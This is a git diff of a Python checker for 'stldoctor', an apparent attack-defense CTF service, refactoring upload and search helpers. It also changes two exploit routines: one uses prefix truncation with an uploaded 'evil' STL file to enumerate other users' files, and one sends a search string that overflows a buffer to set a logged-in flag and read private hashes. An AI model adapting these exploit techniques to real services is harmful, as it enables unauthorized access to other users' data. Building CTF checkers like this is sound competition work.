about summary refs log tree commit diff stats
path: root/checker
diff options
context:
space:
mode:
Diffstat (limited to 'checker')
-rw-r--r--checker/local.sh2
-rw-r--r--checker/src/checker.py170
2 files changed, 95 insertions, 77 deletions
diff --git a/checker/local.sh b/checker/local.sh
index 81a6312..713bea0 100644
--- a/checker/local.sh
+++ b/checker/local.sh
@@ -11,4 +11,4 @@ export MONGO_PORT=27017
export MONGO_USER=stldoctor_checker
export MONGO_PASSWORD=stldoctor_checker
-python3 src/checker.py $@
+python3 -u src/checker.py $@
diff --git a/checker/src/checker.py b/checker/src/checker.py
index 6a05448..eb3c521 100644
--- a/checker/src/checker.py
+++ b/checker/src/checker.py
@@ -53,7 +53,7 @@ solid test\xff
vertex 0 1 0
endloop
endfacet
-endsolid test\xff
+endsolid
"""
checker = Enochecker("stldoctor", 9090)
@@ -82,7 +82,7 @@ class Session:
return self
async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None:
- await timed(self.exit(), self.logger, ctx="closing session")
+ await timed(self.close(), self.logger, ctx="closing session")
async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes:
try:
@@ -133,25 +133,16 @@ def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session:
return Session(socket, logger)
-def ensure_bytes(v: Union[str, bytes]) -> bytes:
- if type(v) == bytes:
- return v
- elif type(v) == str:
- return v.encode()
- else:
- raise InternalErrorException(f"Tried to convert {type(v)} arg to bytes")
-
-
def includes_all(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) not in resp:
+ if m not in resp:
return False
return True
def includes_any(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) in resp:
+ if m in resp:
return True
return False
@@ -420,36 +411,57 @@ async def do_upload(
stlfile: bytes,
check: bool = True,
) -> Optional[bytes]:
- # Upload file
+
session.logger.debug(f"Uploading model with name {modelname!r}")
session.write(b"upload\n")
+
+ # enter name and check resp
session.write(modelname + b"\n")
+ await session.drain()
+ await session.readuntil(b"name: ")
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during name check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
+
+ # enter size and check resp
+ await session.readuntil(b"size: ")
session.write(f"{len(stlfile)}\n".encode())
- session.write(stlfile)
await session.drain()
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during size check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
- # Check for errors
- # TODO improve by reading responses separately
- resp = await session.readline(ctx="reading upload response (1)")
- resp += await session.readline(ctx="reading upload response (2)")
+ await session.readuntil(b"listening..\n")
+ session.write(stlfile)
+ await session.drain()
+ resp = await session.readline()
if b"ERR:" in resp:
if check:
- session.logger.critical(f"Failed to upload model {modelname!r}:\n{resp!r}")
+ session.logger.critical(f"Failed during stl parsing: {resp!r}")
raise MumbleException("File upload not working properly")
- await session.readuntil(prompt, ctx="waiting for prompt")
return None
- # Parse ID
+ # parse returned id
try:
modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
if modelid == b"":
raise Exception
except:
session.logger.critical(
- f"Invalid response during upload of {modelname!r}:\n{resp!r}"
+ f"Invalid file size during upload of {modelname!r}:\n{resp!r}"
)
raise MumbleException("File upload not working properly")
+ session.logger.debug(f"Uploaded model id: {modelid!r}")
+
await session.readuntil(prompt, ctx="waiting for prompt")
return modelid
@@ -460,38 +472,38 @@ async def do_search(
download: bool = False,
check: bool = True,
) -> Optional[tuple[bytes, bytes]]:
- modelname = ensure_bytes(modelname)
-
- # Initiate download
session.logger.debug(f"Retrieving model with name {modelname!r}")
+
+ # get possible hashes
session.write(b"search " + modelname + b"\n")
- session.write(b"0\n") # first result
- session.write(b"y\n" if download else b"n\n")
- session.write(b"q\n") # quit
await session.drain()
-
- # Check if an error occured
- line = await session.readline()
- if b"ERR:" in line:
+ resp = await session.readline()
+ if b"ERR:" in resp:
if check:
session.logger.critical(
- f"Failed to retrieve model {modelname!r}:\n{line!r}"
+ f"Failed to retrieve model {modelname!r}:\n{resp!r}"
)
raise MumbleException("File search not working properly")
- if b"Couldn't find a matching scan result" in line:
- # collect all the invalid commands sent after (hacky)
- # TODO: improve by checking every response in search
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
return None
+ resp = resp + await session.readuntil(b"> ")
+ results = [l.strip() for l in resp[:-2].split(b"\n")]
- # read until end of info box
- fileinfo = line + await session.readuntil(
+ # request first result
+ session.write(results[0] + b"\n")
+ await session.drain()
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ if check:
+ session.logger.critical(f"Error selecting file: {results[0]!r}")
+ raise MumbleException("File search not working properly")
+ return None
+ fileinfo = resp + await session.readuntil(
b"================== \n", ctx="reading stl info"
)
+ # download if requested
+ session.write(b"y\n" if download else b"n\n")
+ await session.drain()
stlfile = b""
if download: # Parse file contents
await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)")
@@ -499,13 +511,15 @@ async def do_search(
resp = resp[:-3]
size = parse_int(resp)
if size is None:
- raise MumbleException(
- f"Received invalid download size, response:\n{resp!r}"
- )
-
+ raise MumbleException(f"Invalid download size: {resp!r}")
session.logger.debug(f"Download size: {size}")
stlfile = await session.read(size, ctx="reading stl contents")
+ # only one result
+ session.write(b"q\n")
+ await session.drain()
+
+ # cleanup..
await session.readuntil(prompt)
return fileinfo, stlfile
@@ -513,14 +527,6 @@ async def do_search(
# CHECK WRAPPERS #
-async def check_line(session: Session, context: str) -> bytes:
- line = await session.readline()
- if b"ERR:" in line:
- session.logger.critical(f"{context}: Unexpected error message\n")
- raise MumbleException("Service returned error during valid interaction")
- return line
-
-
async def check_listed(session: Session, includes: list[bytes]) -> bytes:
resp = await do_list(session, check=True)
assert resp is not None
@@ -742,7 +748,8 @@ async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -
# Ensure a malformed file causes an error
session = await di.get(Session)
- if await do_upload(session, modelname, stlfile, check=False):
+ resp = await do_upload(session, modelname, stlfile, check=False)
+ if resp is not None:
session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}")
raise MumbleException("Upload validation not working properly")
@@ -754,8 +761,8 @@ async def test_search(di: DependencyInjector, registered: bool = False) -> None:
session = await di.get(Session)
if registered:
await do_auth(session, authstr, check=True)
- if resp := await do_search(session, modelname, download=False, check=False):
- assert resp is not None
+ resp = await do_search(session, modelname, download=False, check=False)
+ if resp is not None:
session.logger.critical(
f"Search for file that shouldn't exist succeeded:\n{resp[0]+resp[1]!r}"
)
@@ -1002,33 +1009,45 @@ async def exploit_prefix_truncation(di: DependencyInjector) -> bytes:
modelname = fakeid()
searcher = await di.get(FlagSearcher)
- # Upload evil file for parse via search for hash truncation
session = await di.get(Session)
session.logger.debug("Uploading evil file for hash truncation")
+
+ # Upload evil file
await do_upload(session, modelname, stlfile=search_truncation_payload, check=True)
search_resp = await do_search(session, modelname, download=False, check=True)
- assert search_resp is not None
- info, contents = search_resp
+ print(search_resp)
+
+ # Retrieve evil file for hash truncation
session.write(b"search last\n")
await session.drain()
- filelist_resp = await session.readuntil(b"? ", ctx="reading search results")
- filelist = [
- l.strip().split(b" : ")[1] for l in filelist_resp.split(b"\n") if b" : " in l
- ]
+ filelist_resp = await session.readuntil(
+ b"[q to quit]: ", ctx="reading search results"
+ )
+ session.logger.critical(filelist_resp)
+ filelist = [l.strip() for l in filelist_resp.split(b"\n")[:-1] if l.strip() != b""]
if len(filelist) == 0:
raise MumbleException("Failed to list files through search")
+ session.logger.critical(filelist)
# Use it to enumerate other files and grab contents
flag = None
- for i, fhash in enumerate(filelist):
- session.logger.debug(f"Retrieving file {fhash} at index {i}")
- session.write(f"{i}\nn\n".encode())
+ for fhash in filelist:
+ session.logger.debug(f"Retrieving file {fhash}")
+ session.write(fhash + b"\n")
+ session.write(b"n\n")
await session.drain()
- filelist_resp = await session.readuntil(
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ session.logger.critical(f"Failed on selection of file: {resp!r}")
+ raise MumbleException("Failed to retrieve file contents via exploit")
+ resp += await session.readuntil(
b"==================", ctx="getting file info (1)"
)
- filelist_resp += await session.readuntil(b"? ", ctx="getting file info (2)")
- if flag := searcher.search_flag(filelist_resp.decode("latin1")):
+ resp += await session.readuntil(
+ b"[q to quit]: ", ctx="getting file info (2)"
+ )
+ session.logger.critical(resp)
+ if flag := searcher.search_flag(resp):
break
# Done!
@@ -1050,7 +1069,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
session = await di.get(Session)
session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
await session.drain()
- await session.readuntil(prompt, ctx="getting user hashes via search")
+ await session.readuntil(prompt, ctx="overflowing loggedin via search")
session.write(b"auth\n")
await session.drain()
resp = await session.readuntil(prompt, ctx="checking auth success")
@@ -1058,9 +1077,8 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
raise MumbleException("Exploit did not set 'loggedin' variable via overflow")
# Get private user hashes via 'list'
- resp = await do_list(session, check=False)
- if not resp:
- raise MumbleException("")
+ resp = await do_list(session, check=True)
+ session.logger.critical(resp)
users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
await session.exit()
@@ -1088,7 +1106,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
solidnames = b"\n".join(
[l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]
)
- if flag := searcher.search_flag(solidnames.decode("latin1")):
+ if flag := searcher.search_flag(solidnames):
return flag
raise MumbleException("Exploit for flagstore 2 failed")